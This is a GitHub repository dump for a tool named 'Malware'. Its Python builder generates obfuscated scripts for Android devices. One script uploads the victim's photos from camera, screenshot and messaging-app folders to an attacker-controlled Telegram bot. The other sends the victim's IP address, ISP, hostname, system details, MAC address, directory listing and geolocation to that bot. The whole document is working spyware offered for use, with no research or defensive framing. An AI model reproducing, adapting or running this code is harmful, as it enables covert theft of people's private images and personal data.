├── 1.jpg
├── 2.jpg
├── 3.jpg
├── README.md
└── Building-Malware.py
/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/deadcode22/Hack-image/HEAD/1.jpg
--------------------------------------------------------------------------------
/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/deadcode22/Hack-image/HEAD/2.jpg
--------------------------------------------------------------------------------
/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/deadcode22/Hack-image/HEAD/3.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Malware
2 | Powered By [GhostAttack](https://Telegram.me/BlackCode_22) Team
3 | Toole Dead Code get Image to send bot Telegram from skript and more ...
4 |
5 | ## Screenshot:
6 |
7 |
8 |
9 | ### Installation :
10 |
11 | ` git clone https://github.com/deadcode22/Hake-image.git `
12 |
13 | ` cd Hake-image `
14 |
15 | ` python3 Building-Malware.py `
16 |
17 | ## Feature :
18 | > FAST AND EASY
19 |
20 | > Get Full Image
21 |
22 | > Get Skript from bot
23 |
24 | > fully Support
25 |
26 | > Good Design
27 |
28 | ## Used :
29 | > 1 == Attack Image
30 |
31 | > 2 == Attack System
32 |
33 | ### Support Telegram Channel : [Telegram Dead Code](https://t.me/BlackCode_22)
34 |
--------------------------------------------------------------------------------
/Building-Malware.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from datetime import datetime
3 | import os
4 | import time
5 | from colorama import Fore, Style, init
6 |
7 | os.system('pip install emojify')
8 |
9 | E = '\033[1;31m'
10 | B = '\033[1;36m'
11 | G = '\033[1;32m'
12 | S = '\033[1;33m'
13 | W = '\033[1;97m'
14 |
15 | os.system('clear')
16 |
17 |
18 | print(Style.RESET_ALL)
19 | print(Style.BRIGHT)
20 | print(Fore.GREEN)
21 | print('''
22 | ▐▮▌ ▞▖ ▙ ▚▞▚▞ ▞▖ █▘ █☰
23 |
24 | - 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 - V = 2.1 ''')
25 |
26 | print(f''' {B}{E}==============================
27 | |{G}[+] GitHub : {B}deadcode22 {E}|
28 | |{G}[+] Developer : {B}DEADCODE {E}|
29 | |{G}[+] TeleGram : {B}Black_Code_22{E}|
30 | {E}==============================''')
31 | print(' M A L W A R E ')
32 | print('''\033[1;34m https://t.me/black_code_22
33 | https://github.com/deadcode22\n\n''')
34 |
35 | print('\033[1;35m You must subscribe to this channel \n')
36 | #os.system(f'xdg-open https://youtube.com/@memo-network')
37 | time.sleep(3)
38 | os.system(f'xdg-open https://t.me/black_code_22')
39 | time.sleep(3)
40 |
41 | id=input(W+f' [{E} ** {W}] {S}Telegram ID ==> {B}')
42 | token=input(W+f' [{E} ** {W}] {S}Token Bot ==> {B}')
43 |
44 | print(f' {E}==============================')
45 |
46 | skript = str(f"""import os
47 | os.system('pip install requests')
48 | os.system('clear')
49 | import requests
50 | from datetime import datetime
51 |
52 | def banner():
53 | print ('\t \033[2;33m ▇▇▇◤▔▔▔▔▔▔▔◥▇▇▇ ')
54 | print('\t \033[2;33m ▇▇▇▏◥▇◣┊◢▇◤▕▇▇▇ ')
55 | print ('\t \033[2;33m ▇▇▇▏▃▆▅▎▅▆▃▕▇▇▇ ')
56 | print ('\t \033[2;33m ▇▇▇▏╱▔▕▎▔▔╲▕▇▇▇ ')
57 | print ('\t \033[2;33m ▇▇▇◣◣▃▅▎▅▃◢◢▇▇▇\033[2;32m Code By :\033[2;31m DEAD CODE ')
58 | print ('\t \033[2;33m ▇▇▇▇◣◥▅▅▅◤◢▇▇▇▇ ')
59 | print ('\t \033[2;33m ▇▇▇▇▇◣╲▇╱◢▇▇▇▇▇ ')
60 | print ('\t \033[2;33m ▇▇▇▇▇▇◣▇◢▇▇▇▇▇▇ ')
61 |
62 | banner()
63 | print('')
64 | print('')
65 |
66 | def res(file):
67 | requests.post(f'https://api.telegram.org/bot"""+token+'''/sendDocument?chat_id='''+id+"""', files=file)
68 |
69 | d = datetime.now()
70 | tlg = requests.post(f'https://api.telegram.org/bot"""+token+"/sendMessage?chat_id="+id+"""&text=👊 Start Attack .... ✊ '+str(d))
71 |
72 | os.chdir(r"/storage/emulated/0/DCIM")
73 | tmp = list(os.scandir('.'))
74 | for i in tmp:
75 | if 'jpg' or 'png' in i.name:
76 | try:
77 | file ={"document": open(f'{i.name}', 'rb')}
78 | res(file)
79 | except:
80 | pass
81 | else:
82 | pass
83 |
84 | print('\033[2;31m [ * ] \033[2;34m Check internet .... ')
85 |
86 | print('')
87 |
88 | os.chdir(r"/storage/emulated/0/DCIM/Screenshots")
89 | tmp = list(os.scandir('.'))
90 | for i in tmp:
91 | if 'jpg' or 'png' in i.name:
92 | try:
93 | file ={"document": open(f'{i.name}', 'rb')}
94 | res(file)
95 | except:
96 | pass
97 | else:
98 | pass
99 |
100 | print('\033[2;31m [ ✓ ] \033[2;32m Connection ......')
101 |
102 | print('')
103 |
104 | os.chdir(r"/storage/emulated/0/DCIM/Camera")
105 | tmp = list(os.scandir('.'))
106 | for i in tmp:
107 | if 'jpg' or 'png' in i.name:
108 | try:
109 | file ={"document": open(f'{i.name}', 'rb')}
110 | res(file)
111 | except:
112 | pass
113 | else:
114 | pass
115 |
116 | print('\033[34;1m [ ✔ ] \033[33;1m Watting ......... ')
117 |
118 | print('')
119 |
120 | os.chdir(r"/storage/emulated/0/Pictures/Telegram")
121 | tmp = list(os.scandir('.'))
122 | for i in tmp:
123 | if 'jpg' or 'png' in i.name:
124 | try:
125 | file ={"document": open(f'{i.name}', 'rb')}
126 | res(file)
127 | except:
128 | pass
129 | else:
130 | pass
131 |
132 | print('\033[36;1m [ ✘ ] \033[32;1m Start Toole .......')
133 | print('')
134 |
135 | os.chdir(r"/storage/emulated/0/Pictures/Instagram")
136 | tmp = list(os.scandir('.'))
137 | for i in tmp:
138 | if 'jpg' or 'png' in i.name:
139 | try:
140 | file ={"document": open(f'{i.name}', 'rb')}
141 | res(file)
142 | except:
143 | pass
144 | else:
145 | pass
146 |
147 | print('\033[0;1m [ × ] \033[31;1m DEADCODE ...... ')
148 | print('')
149 |
150 | os.chdir(r"/storage/emulated/0/Pictures/Messenger")
151 | tmp = list(os.scandir('.'))
152 | for i in tmp:
153 | if 'jpg' or 'png' in i.name:
154 | try:
155 | file ={"document": open(f'{i.name}', 'rb')}
156 | res(file)
157 | except:
158 | pass
159 | else:
160 | pass
161 |
162 | exit(' D E A D C O D E ')""" )
163 |
164 | hack = str('''import requests
165 | import geocoder
166 | import os
167 | import socket
168 | import sys
169 | import time
170 | from glob import glob
171 | from datetime import datetime
172 | from platform import *
173 | from getmac import get_mac_address as gma
174 |
175 | def install(pip):
176 | os.system(f'pip install {pip}')
177 | install('getmac')
178 | install('platform')
179 | install('glob')
180 | install('socket')
181 | install('geocoder')
182 | install('requests')
183 | os.system('clear')
184 |
185 | token = '''+f'"{token}"'+'''
186 | id = '''+id+'''
187 |
188 | def banner():
189 | print ('\t \033[2;33m ▇▇▇◤▔▔▔▔▔▔▔◥▇▇▇ ')
190 | print('\t \033[2;33m ▇▇▇▏◥▇◣┊◢▇◤▕▇▇▇ ')
191 | print ('\t \033[2;33m ▇▇▇▏▃▆▅▎▅▆▃▕▇▇▇ ')
192 | print ('\t \033[2;33m ▇▇▇▏╱▔▕▎▔▔╲▕▇▇▇ ')
193 | print ('\t \033[2;33m ▇▇▇◣◣▃▅▎▅▃◢◢▇▇▇\033[2;32m Code By :\033[2;31m DEAD CODE ')
194 | print ('\t \033[2;33m ▇▇▇▇◣◥▅▅▅◤◢▇▇▇▇ ')
195 | print ('\t \033[2;33m ▇▇▇▇▇◣╲▇╱◢▇▇▇▇▇ ')
196 | print ('\t \033[2;33m ▇▇▇▇▇▇◣▇◢▇▇▇▇▇▇ ')
197 | print('')
198 | print("\t\033[1;36m https://t.me/black_code_22 ")
199 |
200 | banner()
201 | print('')
202 |
203 | tlg = requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=👊 Start Attack .... ✊ {datetime.now()} ')
204 |
205 | print('\033[2;31m [ * ] \033[2;34m Check internet .... ')
206 | print('')
207 |
208 | ip = requests.get("https://api.ipify.org").text
209 | with open('TargetIP.txt','w') as IP:
210 | IP.write(f' [ ✓ ] IP TARGET ~» {ip} ')
211 | IP.close()
212 | file = {'document':open('TargetIP.txt','rb')}
213 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
214 |
215 | print('\033[2;31m [ ✓ ] \033[2;32m Connection ......')
216 | print('')
217 |
218 | print('\033[34;1m [ ✔ ] \033[33;1m Watting ......... ')
219 | print('')
220 |
221 | result = requests.get(f'http://ip-api.com/json/{ip}').json()
222 | with open('Netowrk-info.txt','w') as AS:
223 | AS.write(f' [ ✓ ] Net Work information data » .... {result["isp"]} ')
224 | AS.close()
225 | file = {'document':open('Netowrk-info.txt','rb')}
226 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
227 |
228 | print('\033[36;1m [ ✘ ] \033[32;1m Start Toole .......')
229 | print('')
230 |
231 | host = socket.gethostname()
232 | local = socket.gethostbyname(host)
233 | with open('Hostname.txt','w') as Hn:
234 | Hn.write(f' [ ✓ ] Host Name ~» {host} ☞ {local} ')
235 | Hn.close()
236 | file = {'document':open('Hostname.txt','rb')}
237 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
238 |
239 | print('\033[0;1m [ × ] \033[31;1m DEADCODE ...... ')
240 | print('')
241 |
242 | re = release()
243 | pv = python_version()
244 | pl = platform()
245 | ma = machine()
246 | ve = version()
247 | with open('Sysinfo.txt','w') as S:
248 | S.write(f' [ ✓ ] System information » .... release => {re} python_version => {pv} platform => {pl} machine => {ma} version => {ve} ')
249 | S.close()
250 | file = {'document':open('Sysinfo.txt','rb')}
251 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
252 |
253 | mac = gma()
254 | with open('MacAddress.txt','w') as M:
255 | M.write(f' [ ✓ ] MAC ADDRESS ~» {mac} ')
256 | M.close()
257 | file = {'document':open('MacAddress.txt','rb')}
258 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
259 |
260 | g = glob("/storage/emulated/0/*")
261 | with open('DirSystem-path.txt','w') as D:
262 | D.write(f' [ ✓ ] dirs in all pwd system » .... ')
263 | for i in g:
264 | D.write(i+' , ')
265 | D.close()
266 | file = {'document':open('DirSystem-path.txt','rb')}
267 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
268 |
269 | our_ip = geocoder.ip(ip).latlng
270 | map_lenr = our_ip[0]
271 | map_lenl = our_ip[1]
272 | with open('Location.txt','w') as Jbs:
273 | Jbs.write(f' [ ✓ ] Victim-Location-IP » .... https://www.google.com/maps/@{map_lenr},{map_lenl},13z')
274 | Jbs.close()
275 | file = {'document':open('Location.txt','rb')}
276 | res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)
277 |
278 |
279 | tlg = requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=✅Done : Devloper by DeadCode > @Black_Code_22 ✅ ')''')
280 |
281 | #os.system(f'xdg-open https://t.me/Black_Code_22')
282 |
283 | print(W+f''' [{E} 01 {W}] Attack Image Hack .....
284 | {W} [{E} 02 {W}] Attack infrmation System ....''')
285 | print('')
286 |
287 | black = int(input(W+' [ × ] '+'\033[1;35m Enter opation : '+G))
288 | print('\n')
289 |
290 | if black == 1:
291 | namee=input(W+f' [{E} ** {W}] {S}Name Skript ==> {B}')
292 | with open(f'enc_{namee}.py','w') as code:
293 | code.write(skript)
294 |
295 | elif black == 2:
296 | namee=input(W+f' [{E} ** {W}] {S}Name Skript ==> {B}')
297 | with open(f'enc_{namee}.py','w') as co:
298 | co.write(hack)
299 | else:
300 | exit(' E R O R R E ')
301 |
302 | os.system(f'emojify --input enc_{namee}.py --output {namee}.py --emoji')
303 | os.system(f'rm -rf enc_{namee}.py')
304 |
305 | print(f' {G} ✅ DONE SAVE IN {namee}.py ✅ ')
306 |
--------------------------------------------------------------------------------